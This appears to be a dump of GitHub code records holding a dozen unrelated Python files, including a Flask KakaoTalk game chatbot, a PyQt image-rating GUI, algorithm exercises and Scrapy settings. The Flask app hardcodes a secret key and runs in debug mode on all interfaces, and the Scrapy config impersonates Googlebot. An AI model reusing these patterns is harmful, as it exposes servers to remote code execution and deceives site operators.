+{"seq_id":"6228048624","text":"'''\r\nRaising an exception[raising exception means raising error description from our end when we get error]\r\n====================\r\n --------- python\r\n When there is fault in runtime---exception is raised--handles by--|\r\n by system --------try.excet(user defined)\r\n\r\nTill now exception is raised internally by system,\r\nif there is need to raised an exception,\r\nthen raise keyword to raise an exception.\r\n\r\nexception is raised with recepct to certain condition.\r\nSyntax to raise exception\r\n=========================\r\n\r\n raise ExceptionName('Message')\r\n\r\n'''\r\n\r\n\r\n\r\nx=int(input(\"enter numerator:\"))#x=9|x=9\r\ny=int(input(\"enter denominator:\"))#y=2|y=0\r\n\r\nif y==0: #2==0F|0==0T\r\n\r\n raise ZeroDivisionError('Denominator cannot be Zero!!')\r\n\r\n\r\nelse:\r\n d=x/y #9/2=>4.5 |9/0=> Exception is rasied|ZeroDivisionError\r\n print(\"Division is:\",d)\r\n\r\n'''\r\noutput:-\r\n\r\nenter numerator:9\r\nenter denominator:2\r\nDivision is: 4.5\r\n\r\n======== RESTART: C:/8.exception handling in python/raising_exception.py =======\r\nenter numerator:9\r\nenter denominator:0\r\nTraceback (most recent call last):\r\n File \"C:/8.exception handling in python/raising_exception.py\", line 27, in \r\n raise ZeroDivisionError('Denominator cannot be Zero!!')\r\nZeroDivisionError: Denominator cannot be Zero!!\r\n\r\n'''\r\n\r\n'''\r\nhome work:-\r\n\r\ncheck weither it is digit or not then if it is not digit then raise a exception for above code\r\n\r\n'''","repo_name":"CODERAJIT/Python-files","sub_path":"exception_handling in python/rasing_exception.py","file_name":"rasing_exception.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"19186464576","text":"from appium import webdriver\nfrom time import sleep\nfrom appium.webdriver.common.touch_action import TouchAction\n\ndesired_capabilities ={\n\"platformName\": \"Android\",\n\"platformVersion\": \"5.1.1\",\n\"deviceName\": \"62001\"\n}\n\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub',desired_capabilities=desired_capabilities)\nsleep(3)\n\n#定位元素\nmtxx = driver.find_element_by_accessibility_id(('美图秀秀'))\n#长按元素 可以一系列操作 执行\npressed = TouchAction(driver).long_press(mtxx).perform()\n#拖动并释放元素\npressed.move_to(x=125,y=84).release().perform()\n#点击确认\ndriver.tap([(591,732)])\nsleep((5))\n\n#用命令行工具实现\n#百度ANDRIOD KEYCODE\n#CMD:adb shell input keyevent KEYCODE_HOME\n#CMD:adb shell input keyevent 3","repo_name":"bai345767318/python-java","sub_path":"python/appium/demo08.py","file_name":"demo08.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35386725864","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nx = np.linspace(0, 5, 1000)\n\nf = 2\ny = np.sin(f * x * 2 * np.pi)\ny += 0.1 * np.sin(2 * f * x * 2 * np.pi)\ny += 0.4 * np.sin(3 * f * x * 2 * np.pi)\n\n\nif __name__ == \"__main__\":\n\n df = pd.DataFrame({\"x\": x, \"y\": y})\n df.to_csv(\"sinus.csv\", float_format='%.5f', index=False)\n\n plt.plot(x, y)\n plt.show()\n","repo_name":"MaxiHartmann/pyqt_learning","sub_path":"004_matplot_selection/data/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74998440221","text":"def search_quadruplets(arr,target):\n arr.sort()\n quadruplets = []\n\n for i in range(0,len(arr)-3):\n if i>0 and arr[i] == arr[i-1]:\n continue\n for j in range(i+1,len(arr)-2):\n if j > i+1 and arr[j] == arr[j-1]:\n continue\n search_pairs(arr,target,i,j,quadruplets)\n return quadruplets\n\ndef search_pairs(arr,target_sum, first, second, quadruplets):\n left = second + 1\n right = len(arr) - 1\n\n while (left < right):\n suma = arr[first] + arr[second] + arr[left] + arr[right]\n if suma == target_sum:\n quadruplets.append([arr[first],arr[second],arr[left],arr[right]])\n left += 1\n right -= 1\n while (left < right and arr[left]==arr[left-1]):\n left += 1\n while (left < right and arr[right]==arr[right+1]):\n right -= 1\n elif suma < target_sum:\n left += 1\n else:\n right -= 1\n\nprint(search_quadruplets([4,1,2,-1,1,-3],1)) #[[-3, -1, 1, 4], [-3, 1, 1, 2]]\nprint(search_quadruplets([4,1,2,-1,1,-3],1)) #[[-2, 0, 2, 2], [-1, 0, 1, 2]]\n ","repo_name":"alimalim77/Python-Practice-Track","sub_path":"Warm Up/four_sum.py","file_name":"four_sum.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72598515743","text":"#!env python3\n\nimport os\nimport sys\n# import pandas as pd\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nfrom PyQt5.QtGui import QIcon, QColor\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QWidget, QDialog, QMainWindow, QDesktopWidget\nsys.path.append(os.path.dirname(__file__)) \ntry:\n from . import mainwindow\nexcept (ImportError, SystemError):\n try: \n import mainwindow\n except ModuleNotFoundError:\n pass\n\nfrom collections import defaultdict\n\n\ndef find_files(dirname, match=None):\n result = []\n for root, dirs, files in os.walk(dirname):\n for file_ in files:\n if match is None or match in file_:\n result.append(file_)\n return result\n\n\nclass LensRater(QMainWindow, mainwindow.Ui_MainWindow):\n \"\"\" A hacked-together gui for rating lens images.\n TODO:\n Side-by-side for subtractions or single band images\n Expand image - zoom out\n Zoom in further\n Review choices made\n Produce output montages\n Access images remotely\n \"\"\"\n\n colour_codes = [Qt.black, QColor(27, 76, 198), QColor(234, 224, 23), QColor(198, 13, 13), Qt.gray]\n categories = [\"\", \"Maybe\", \"Probably\", \"Definitely\"]\n\n def __init__(self, image_dir):\n super(LensRater, self).__init__()\n self.setupUi(self)\n\n self.next_button.clicked.connect(self.nextImage)\n self.prev_button.clicked.connect(self.prevImage)\n\n self.image_dir = image_dir\n self.image_files = sorted(find_files(image_dir, match=\".png\"))\n if len(self.image_files) == 0:\n print(\"No image files found.\")\n sys.exit(0)\n self.image_index = 0\n self.current_image = None\n self.progress_bar.setMaximum(len(self.image_files))\n self.scorefile = self.image_dir + \"/scores.csv\"\n self.scores = defaultdict(lambda: -1)\n self.setChildrenFocusPolicy(QtCore.Qt.NoFocus)\n QtWidgets.qApp.installEventFilter(self)\n\n self.radios = [self.radio_0, self.radio_1, self.radio_2, self.radio_3]\n for i in range(4):\n self.radios[i].toggled.connect(self.radio_score)\n # self.radios[i].setFocusPolicy(QtCore.Qt.NoFocus)\n \n self.set_username_button.clicked.connect(self.update_username)\n self.username_edit.returnPressed.connect(self.set_username)\n self.jump_box.returnPressed.connect(self.jumped_to)\n self.actionSave_and_Quit.triggered.connect(self.close)\n self.actionQuit_without_saving.triggered.connect(self.quit)\n self.actionReset_scores.triggered.connect(self.reset)\n\n p = self.palette()\n p.setColor(self.backgroundRole(), Qt.white)\n self.setPalette(p)\n\n qtRectangle = self.frameGeometry()\n centerPoint = QDesktopWidget().availableGeometry().center()\n qtRectangle.moveCenter(centerPoint)\n self.move(qtRectangle.topLeft())\n\n self.set_label.setText(os.path.abspath(image_dir).split(\"/\")[-1])\n self.username = os.environ.get(\"USER\", \"nobody\")\n self.load()\n self.username_edit.setText(self.username)\n self.go_to_last()\n # self.goto_image(0)\n\n def set_colour_code(self, colour):\n p = self.colour_label.palette()\n p.setColor(self.backgroundRole(), colour)\n self.colour_label.setPalette(p)\n\n def setChildrenFocusPolicy(self, policy):\n def recursiveSetChildFocusPolicy(parentQWidget):\n for childQWidget in parentQWidget.findChildren(QWidget):\n if childQWidget == self.username_edit or childQWidget == self.jump_box:\n continue\n childQWidget.setFocusPolicy(policy)\n recursiveSetChildFocusPolicy(childQWidget)\n\n recursiveSetChildFocusPolicy(self)\n\n def eventFilter(self, source, event):\n if event.type() == QtCore.QEvent.KeyPress:\n if event.key() == QtCore.Qt.Key_Left or event.key(\n ) == QtCore.Qt.Key_Right:\n self.keyPressEvent(event)\n return True\n return super(LensRater, self).eventFilter(source, event)\n\n def keyPressEvent(self, e):\n if e.key() == QtCore.Qt.Key_Escape:\n self.close()\n elif e.key() == QtCore.Qt.Key_Right or e.key() == QtCore.Qt.Key_J:\n self.nextImage()\n elif e.key() == QtCore.Qt.Key_Left or e.key() == QtCore.Qt.Key_K:\n self.prevImage()\n elif e.key() == QtCore.Qt.Key_End:\n self.goto_image(len(self.image_files) - 1)\n elif e.key() == QtCore.Qt.Key_Home:\n self.goto_image(0)\n elif e.key() == QtCore.Qt.Key_PageUp:\n self.goto_image(max(self.image_index - 10, 0))\n elif e.key() == QtCore.Qt.Key_PageDown:\n self.goto_image(\n min(self.image_index + 10, len(self.image_files) - 1))\n elif e.key() == QtCore.Qt.Key_Space:\n # self.up_score()\n self.nextImage()\n elif e.key() == QtCore.Qt.Key_0 or e.key() == QtCore.Qt.Key_QuoteLeft:\n self.score_image(0)\n elif e.key() == QtCore.Qt.Key_1:\n self.score_image(1)\n elif e.key() == QtCore.Qt.Key_2:\n self.score_image(2)\n elif e.key() == QtCore.Qt.Key_3:\n self.score_image(3)\n # elif e.key() == QtCore.Qt.Key_Right:\n # pass\n # elif e.key() == QtCore.Qt.Key_Right:\n # pass\n # elif e.key() == QtCore.Qt.Key_Right:\n # pass\n elif e.key() == QtCore.Qt.Key_Return:\n pass\n # self.close()\n\n def nextImage(self):\n if self.image_index < len(self.image_files) - 1:\n self.image_index += 1\n self.goto_image(self.image_index)\n\n def prevImage(self):\n if self.image_index > 0:\n self.image_index -= 1\n self.goto_image(self.image_index)\n\n def goto_image(self, index):\n self.image_index = index\n self.current_image = self.image_files[index]\n self.set_display_image(self.image_files[index])\n self.position_label.setText(str(index) +\": \" + self.current_image)\n self.progress_bar.setValue(index + 1)\n current_score = self.scores[self.current_image]\n self.set_colour_code(LensRater.colour_codes[current_score])\n self.toggle_radio(current_score)\n\n if current_score < 0: # Implicitly score when seen\n self.score_image(0)\n\n def toggle_radio(self, score):\n for i in range(4):\n self.radios[i].setChecked(i == score)\n\n def resizeEvent(self, event):\n self.goto_image(self.image_index)\n\n def set_display_image(self, impath):\n min_dim = min(self.image_label.width(), self.image_label.height())\n image_profile = QtGui.QImage(self.image_dir + \"/\" + impath)\n image_profile = image_profile.scaled(min_dim, min_dim, \\\n aspectRatioMode=QtCore.Qt.KeepAspectRatio, \\\n transformMode=QtCore.Qt.SmoothTransformation)\n # self.image_label.setScaledContents(True)\n self.image_label.setPixmap(QtGui.QPixmap.fromImage(image_profile))\n\n def up_score(self):\n current_score = self.scores[self.current_image]\n newscore = current_score + 1\n if newscore > 3:\n newscore = 0\n self.score_image(newscore)\n\n def go_to_last(self):\n for i, f in enumerate(self.image_files):\n if self.scores[f] < 0:\n self.goto_image(i)\n break\n \n def radio_score(self):\n for i in range(4):\n if self.radios[i].isChecked():\n self.score_image(i)\n break\n\n def score_image(self, score):\n self.scores[self.current_image] = score\n self.set_colour_code(LensRater.colour_codes[score])\n self.toggle_radio(score)\n self.colour_label.setText(LensRater.categories[score])\n\n def load(self):\n if os.path.isfile(self.scorefile):\n with open(self.scorefile, \"r\") as f:\n lines = [s.split(\",\") for s in f.readlines()]\n self.username = lines[1][0]\n for line in lines[1:]:\n self.scores[line[1]] = int(line[2])\n\n def jumped_to(self):\n # self.jump_box.setEnabled(False)\n self.setFocus()\n goto = self.jump_box.text()\n try:\n goto = int(goto)\n self.goto_image(goto)\n except ValueError:\n pass\n self.jump_box.setText(\"\")\n\n def update_username(self):\n self.username_edit.setEnabled(True)\n self.username_edit.setText(\"\")\n self.username_edit.setFocus()\n\n def set_username(self):\n self.set_username_(self.username_edit.text())\n self.username_edit.setEnabled(False)\n self.username_edit.setFocus()\n\n def set_username_(self, username):\n self.username = username\n\n def review_scores(self):\n pass\n\n def save(self):\n with open(self.scorefile, \"w\") as f:\n f.write(\"username,image,score\\n\")\n for file_ in self.image_files:\n f.write(\"%s,%s,%d\\n\" % (self.username, file_.split(\"/\")[-1],\\\n self.scores[file_]))\n\n def quit(self):\n sys.exit(0)\n\n def reset(self):\n for key in self.scores:\n self.scores[key] = -1\n\n def close(self):\n self.save()\n super(LensRater, self).close()\n\n\ndef main():\n app = QApplication(sys.argv)\n iconloc = \"/\".join(__file__.split(\"/\")[0:-1]) + '/icon.png'\n if not os.path.isfile(iconloc):\n iconloc = \"../icon.png\"\n if not os.path.isfile(iconloc):\n iconloc = \"/\".join(__file__.split(\"/\")[0:-1]) + \"/../icon.png\"\n app.setWindowIcon(QIcon(iconloc))\n imgdir = \".\"\n if len(sys.argv) > 1:\n imgdir = sys.argv[1]\n window = LensRater(imgdir)\n app.aboutToQuit.connect(window.save)\n window.show()\n sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"coljac/lensrater","sub_path":"lensrater/lensrater.py","file_name":"lensrater.py","file_ext":"py","file_size_in_byte":9947,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"11358456981","text":"import unittest\n#\n# Design and implement an algorithm that can preprocess a\n# graph and then answer the question \"is x connected to y in the\n# graph\" for any x and y in constant time Theta(1).\n#\n\n#\n# `process_graph` will be called only once on each graph. If you want,\n# you can store whatever information you need for `is_connected` in\n# global variables\n#\ndef mark_component(G, node):\n marked = {}\n open_list = [node]\n while len(open_list) > 0:\n current_node = open_list.pop()\n marked[current_node] = True\n for neighbor in G[current_node]:\n if neighbor not in marked:\n open_list.append(neighbor)\n\n return marked\n\nmarked_dict = {}\ndef process_graph(G):\n for node in G.keys():\n marked = mark_component(G, node)\n marked_dict[node] = marked\n pass\n\n#\n# When being graded, `is_connected` will be called\n# many times so this routine needs to be quick\n#\ndef is_connected(i, j):\n return j in marked_dict[i]\n\n#######\n# Testing\n#\nclass test_preprocess(unittest.TestCase):\n def test(self):\n G = {'a':{'b':1},\n 'b':{'a':1},\n 'c':{'d':1},\n 'd':{'c':1},\n 'e':{}}\n process_graph(G)\n self.assertTrue(is_connected('a', 'b'))\n self.assertFalse(is_connected('a', 'c'))\n\n G = {'a':{'b':1, 'c':1},\n 'b':{'a':1},\n 'c':{'d':1, 'a':1},\n 'd':{'c':1},\n 'e':{}}\n process_graph(G)\n self.assertTrue(is_connected('a', 'b'))\n self.assertTrue(is_connected('a', 'c'))\n self.assertFalse(is_connected('a', 'e'))\n\n\n","repo_name":"gajo357/IntroToAlgorithms","sub_path":"Week7/PreprocessGraphModule.py","file_name":"PreprocessGraphModule.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"38415886448","text":"\"\"\"\n作者:萌新源\n时间:2022/3/30\n操作系统:debian for raspberry pi\n修改请保留本插件的版权\n本插件版权属于萌新源\n要发布请注明出处\n\n\"\"\"\nfrom nonebot import on_keyword\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.onebot.v11 import GroupMessageEvent,Bot,Message,MessageSegment,Event\nimport requests\nimport json\n\nxingzuo = on_keyword({'#星座'})\n\n@xingzuo.handle()\nasync def xz(bot: Bot, event: Event, state: T_State):\n anses = str(event.get_message()).strip()\n ansek = anses.strip('#星座')\n url = f'http://hm.suol.cc/API/xzys.php?msg={ansek}'\n x = requests.get(url)\n ansx = x.text\n b = '{br}'\n n = '\\n'\n# print(hua)\n if b in ansx:\n ansu = ansx.replace(b,n)\n await xingzuo.finish(Message(f'{ansu}'))\n else:\n await xingzuo.finish(Message(f'{ansx}'))\n \n \n\n","repo_name":"Akira-TL/my_bot1","sub_path":"src/plugins/Genshin_Constellation_Score/xzim.py","file_name":"xzim.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"42131596840","text":"from flask import request, render_template, flash, redirect, url_for, jsonify, Flask\nfrom flask import current_app as app\nfrom flask_sqlalchemy import SQLAlchemy # 데이터베이스\nfrom flask_migrate import Migrate\n\nimport os\nimport requests\nimport json\n\n# 모듈화 파일\n\n\n# 데이터 베이스\nfrom models import db, migrate, User, guestBook\n\n# 알림 기능\nfrom informationPart import m_corona\nfrom informationPart import m_movie\nfrom informationPart import m_musicChart\nfrom informationPart import m_welcome\nfrom informationPart import m_weather\n\n# 시스템\nfrom systemPart import myPage\nfrom systemPart import signUp\nfrom systemPart import signIn\nfrom systemPart import blockId\nfrom systemPart import inventory\nfrom systemPart import shop\nfrom systemPart import ranking\nfrom systemPart import get_kakaoKey\n\n# 게임\nfrom gamePart import gamePartInfo\nfrom gamePart import beefUp\nfrom gamePart import mine\nfrom gamePart import fishing\nfrom gamePart import sneeze\nfrom gamePart import hatching\nfrom gamePart import growing\nfrom gamePart import growing_eat\nfrom gamePart import growing_play\n\nfrom minzy import minzy\n\napp = Flask(__name__)\n\n# 데이터베이스 초기화\nBASE_DIR = os.path.dirname(__file__)\ndbfile = os.path.join(BASE_DIR, 'db.sqlite')\n\napp.config['SQLALCHEMY_DATABASE_URI']= 'sqlite:///'+dbfile\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SECRET_KEY'] = 'hijoker'\n\ndb.init_app(app)\nmigrate.init_app(app, db, render_as_batch=True)\ndb.app = app\ndb.create_all()\n\n@app.route('/', methods=['GET','POST']) # 인덱스 페이지\ndef index():\n if request.method == 'POST':\n if not request.form['writer'] or \\\n not request.form['text']:\n flash('입력하지 않은 내용이 있습니다', 'error')\n else:\n gb = guestBook(request.form['writer'], request.form['text'])\n db.session.add(gb)\n db.session.commit()\n flash('글이 성공적으로 작성되었습니다')\n return render_template('index.html', guestBooks = guestBook.query.all())\n\n@app.route('/welcome', methods=['POST']) # 웰컴블록\ndef call_welcome_skill():\n res = m_welcome.welcome()\n return jsonify(res)\n\n@app.route('/func_quick', methods=['POST']) # 기능부분 바로가기메뉴\ndef call_quickmenu():\n res = m_welcome.quick_menu()\n return jsonify(res)\n\n@app.route('/gamePartInfo', methods=['POST']) # 기능부분 바로가기메뉴\ndef call_gamePartInfo():\n res = gamePartInfo.gamePartInfo()\n return jsonify(res)\n\n@app.route('/weather', methods=['POST']) # 날씨 알림\ndef call_weather():\n res = m_weather.weather(request.get_json())\n return jsonify(res)\n\n@app.route('/musicChart',methods=['POST']) # 멜론차트 알림\ndef call_music():\n res = m_musicChart.musicChart()\n return jsonify(res)\n \n@app.route('/movies', methods=['POST']) # 영화 알림\ndef call_movie():\n res = m_movie.movie(request.get_json())\n return jsonify(res)\n\n@app.route('/corona', methods=['POST']) #코로나 알림\ndef call_corona():\n res = m_corona.corona()\n return jsonify(res)\n \n@app.route('/myPage', methods=['POST']) # 마이페이지\ndef call_myPage():\n res = myPage.myPage(request.get_json())\n return jsonify(res)\n\n@app.route('/makeNickname', methods=['POST']) # 닉네임 있는 유저인지 확인\ndef call_makeNickname():\n res = get_kakaoKey.makeNickname(request.get_json())\n return jsonify(res)\n \n@app.route('/signUp', methods=['POST']) # 회원가입\ndef call_signUp():\n res = signUp.signUp(request.get_json())\n return jsonify(res)\n\n@app.route('/signUp_yes', methods=['POST']) # 회원가입2\ndef call_signUp_yes():\n res = signUp.signUp_yes(request.get_json())\n return jsonify(res)\n \n@app.route('/signIn', methods=['POST']) # 로그인\ndef call_signIn():\n res = signIn.signIn(request.get_json())\n return jsonify(res)\n\n@app.route('/attendance', methods=['POST']) # 출석체크\ndef call_attendance():\n res = attendance.attendance(request.get_json())\n return jsonify(res)\n \n@app.route('/inventory', methods=['POST']) # 유저 인벤토리 출력\ndef call_inventory():\n res = inventory.inventory(request.get_json())\n return jsonify(res)\n\n@app.route('/fish_inven', methods=['POST']) # 물고기 인벤토리 출력\ndef call_fish_inven():\n res = inventory.fish_inven(request.get_json())\n return jsonify(res)\n \n@app.route('/sellItem', methods=['POST']) # 아이템 판매하기\ndef call_sellItem():\n res = inventory.sellItem(request.get_json())\n return jsonify(res)\n\n@app.route('/sellItem_yes', methods=['POST']) # 아이템 판매하기 확정\ndef call_sellItem_yes():\n res = inventory.sellItem_yes(request.get_json())\n return jsonify(res)\n \n@app.route('/viewItemDescript', methods=['POST']) # 아이템 설명보기\ndef call_viewItemDescript():\n res = inventory.viewItemDescript(request.get_json())\n return jsonify(res)\n \n@app.route('/itemLock', methods=['POST']) # 아이템 설명보기\ndef call_itemLock():\n res = inventory.itemLock(request.get_json())\n return jsonify(res)\n \n@app.route('/buyAnEquipment', methods=['POST']) # 상점에서 구입 버튼 클릭시\ndef call_buyAnEquipment():\n res = shop.buyAnEquipment(request.get_json())\n return jsonify(res)\n \n@app.route('/shop', methods=['POST']) # 상점\ndef call_shop():\n res = shop.shop()\n return jsonify(res)\n \n@app.route('/shop_equipment', methods=['POST']) # 장비 상점\ndef call_shop_equipment():\n res = shop.shop_equipment()\n return jsonify(res)\n \n@app.route('/shop_pet', methods=['POST']) # 장비 상점\ndef call_shop_pet():\n res = shop.shop_pet()\n return jsonify(res)\n \n@app.route('/ranking', methods=['POST']) # 랭킹\ndef call_ranking():\n res = ranking.ranking(request.get_json())\n return jsonify(res)\n \n@app.route('/beefUp_select', methods=['POST']) # 강화 게임 장비 선택\ndef call_beefUp_select():\n res = beefUp.beefUp_select(request.get_json())\n return jsonify(res)\n \n@app.route('/beefUp', methods=['POST']) # 강화 게임\ndef call_beefUp():\n res = beefUp.beefUp(request.get_json())\n return jsonify(res)\n \n@app.route('/beefUp_try', methods=['POST']) # 강화 게임 결과\ndef call_beefUp_try():\n res = beefUp.beefUp_try(request.get_json())\n return jsonify(res)\n\n@app.route('/mine', methods=['POST']) # 채굴\ndef call_mine():\n res = mine.mine(request.get_json())\n return jsonify(res)\n \n@app.route('/fishing', methods=['POST']) # 낚시\ndef call_fishing():\n res = fishing.fishing(request.get_json())\n return jsonify(res)\n \n@app.route('/hatching', methods=['POST']) # 부화기\ndef call_hatching():\n res = hatching.hatching(request.get_json())\n return jsonify(res)\n \n@app.route('/growing', methods=['POST']) # 훈련센터\ndef call_growing():\n res = growing.growing(request.get_json())\n return jsonify(res)\n \n@app.route('/growing_eat', methods=['POST']) # 훈련센터 먹이주기\ndef call_growing_eat():\n res = growing_eat.growing_eat(request.get_json())\n return jsonify(res)\n \n@app.route('/growing_play', methods=['POST']) # 훈련센터 놀기\ndef call_growing_play():\n res = growing_play.growing_play(request.get_json())\n return jsonify(res)\n \n@app.route('/sneeze_index', methods=['POST']) # 기침게임 인덱스\ndef call_sneeze_index():\n res = sneeze.sneeze_index(request.get_json())\n return jsonify(res)\n \n@app.route('/sneeze_onclick', methods=['POST']) # 기침게임 인덱스\ndef call_sneeze_onclick():\n res = sneeze.sneeze_onclick(request.get_json())\n return jsonify(res)\n \n@app.route('/blockId', methods=['POST']) # 블록아이디 확인용\ndef call_blockId():\n res = blockId.blockId(request.get_json())\n return jsonify(res)\n \n\nif __name__ ==\"__main__\":\n app.run(debug=True,host=\"0.0.0.0\", port=1234)\n\n\n \n \n\n","repo_name":"kuyang95/1319_KakaoChatBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"41722991366","text":"# NAME:\n# FILENAME:\n# SUMMARY:\n\nimport pygame\n\n\nclass Texture:\n def __init__(self, img_path, dim):\n \"\"\"\n A (perhaps overkill?) class for storing/computing/running textures in pygame\n As-is, this only repeats a SINGLE texture\n :param img_path: path to image for texture\n :param dim: width of the base image within the texture\n \"\"\"\n self.image = pygame.image.load(img_path)\n self.dim = dim # dimension of each square of the texture (e.g., 28x28, so a big image would have several)\n self.image = pygame.transform.scale(self.image, (self.dim, self.dim))\n self.image.set_alpha(85)\n\n def tiled(self, max_width, max_height):\n tiled_surf = pygame.Surface((max_width, max_height))\n for x in range(0, max_width + 1, self.dim):\n for y in range(0, max_height + 1, self.dim):\n tiled_surf.blit(self.image, (x, y)) # these makes a 1 surface made of several tiles of self.image\n return tiled_surf\n","repo_name":"Sown-Dev/CMPT330","sub_path":"HW5/textures.py","file_name":"textures.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71563551264","text":"from Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.Align import PairwiseAligner\nfrom tqdm import tqdm\n\nnon_amb_nucs = [\"A\",\"G\",\"C\",\"T\"]\n\nreference = next(SeqIO.parse(open(snakemake.input[0],\"r\"),\"fasta\")).seq\nsequences = list(SeqIO.parse(open(snakemake.input[1],\"r\"),\"fasta\"))\n\naligner = PairwiseAligner()\naligner.mode = \"global\"\naligner.match_score = 1\naligner.mismatch_score = -2\naligner.gap_score = -2\n\nsequence_output = []\n\nfor seq_ref in tqdm(sequences):\n\tseq = seq_ref.seq\n\tseq_str = str(seq_ref.seq).upper()\n\n\tnot_good = False\n\tfor nuc in seq_str:\n\t\tif nuc not in non_amb_nucs:\n\t\t\tnot_good = True\n\t\t\tbreak\n\tif not_good:\n\t\tcontinue\n\n\tseq_ref.seq = Seq(seq_str)\n\n\tif len(seq) != len(reference):\n\t\tcontinue\n\talignment = aligner.align(reference, seq)[0]\n\n\tif \"-\" in alignment.target or \"-\" in alignment.query:\n\t\tcontinue\n\n\tsequence_output.append(seq_ref)\n\nSeqIO.write(sequence_output,open(snakemake.output[0],\"w\"),\"fasta\")\n\n","repo_name":"ArmaanAhmed22/NonSpecificLAMPDesign","sub_path":"preprocess/sequence_filter.py","file_name":"sequence_filter.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74861600864","text":"class Vertex:\n def __init__(self, name):\n self.name = name\n\n\ngraph = {\n # 有向无环图\n # 'A': ['B', 'C'],\n # 'B': ['E'],\n # 'C': ['D'],\n # 'D': ['B'],\n # 'E': [],\n\n # 有向有环图\n # 'A': ['B'],\n # 'B': ['D', 'E'],\n # 'C': ['A'],\n # 'D': ['C'],\n # 'E': [],\n\n 'A': ['B', 'C', 'D'],\n 'B': ['D', 'E'],\n 'C': ['F'],\n 'D': ['C', 'F', 'G'],\n 'E': ['D', 'G'],\n 'F': [],\n 'G': ['F']\n}\n\n\ndef top_sort():\n '''\n 简单的拓扑排序\n :return: 打印节点名和顺序\n '''\n for counter in range(0, len(graph)):\n # 查找入度为0的顶点\n v = findNewVertexOfIndegreeZero()\n # 如果查找不到,说明存在环\n if v is None:\n raise Exception('存在环')\n print('{}的顺序是{}'.format(v, counter))\n # 删除该顶点以及其边\n del graph[v]\n\n\ndef findNewVertexOfIndegreeZero():\n '''\n 查找入度为0的节点\n :return:\n '''\n # 外层循环,遍历所有的节点\n for v in graph.keys():\n # 内层循环,遍历每个节点的邻接节点列表\n for l in graph.values():\n # 如果发现当前节点出现在某节点的邻接列表里,说明它的入度不为0,跳出循环\n if v in l:\n break\n # 如果未出现在所有的邻接列表里,则说明入度为0,return它\n else:\n return v\n\n\ndef top_sort2():\n # 将所有的节点入度初始化为0\n in_degrees = dict((u, 0) for u in graph.keys())\n # 计算所有节点的入度,访问所有顶点的邻接表,出现的次数就是入度\n for v in graph.keys():\n for w in graph[v]:\n in_degrees[w] += 1\n # 筛选入度为0的顶点\n q = [u for u in in_degrees if in_degrees[u] == 0]\n seq = []\n #使用列表的append和pop实现栈,保存入度为0的顶点\n while q:\n u = q.pop()\n seq.append(u)\n # 获取与u邻接的顶点并将其入度-1\n for v in graph[u]:\n in_degrees[v] -= 1\n if in_degrees[v] == 0:\n q.append(v)\n #如果排序后的顶点数和图中的顶点数相同\n if len(seq) == len(in_degrees):\n print(seq)\n return seq\n else:\n return None\n\n\n\nif __name__ == '__main__':\n # top_sort()\n # top_sort2()\n q = []\n q.append(1)\n q.append(2)\n q.append(3)\n print(q)\n a = q.pop()\n print(a)\n print(q)","repo_name":"zjxht62/LearnPython","sub_path":"DataStructureAndAlgorithm/graph/graph_demo.py","file_name":"graph_demo.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"16232745050","text":"# -*- coding: utf-8 -*-\nimport os\n\n# Project absolute path\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n# Scrapy settings for hopwork project\nBOT_NAME = 'hopwork'\n\nSPIDER_MODULES = ['hopwork.spiders']\nNEWSPIDER_MODULE = 'hopwork.spiders'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = False\n\n# Configure maximum concurrent requests performed by Scrapy\nCONCURRENT_REQUESTS = 16\n\n# Configure a delay for requests for the same website\nDOWNLOAD_DELAY = 0\n\n# Enable http cookies\nCOOKIES_ENABLED = True\n\n# Override the default request headers:\nDEFAULT_REQUEST_HEADERS = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.8,ru;q=0.6,uk;q=0.4,und;q=0.2',\n 'Referer': 'https://www.hopwork.fr',\n 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',\n}\n\n# Enable or disable downloader middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\nDOWNLOADER_MIDDLEWARES = {\n # 'scrapy.contrib.downloadermiddleware.useragent.UserAgentMiddleware': None,\n # 'random_useragent.RandomUserAgentMiddleware': 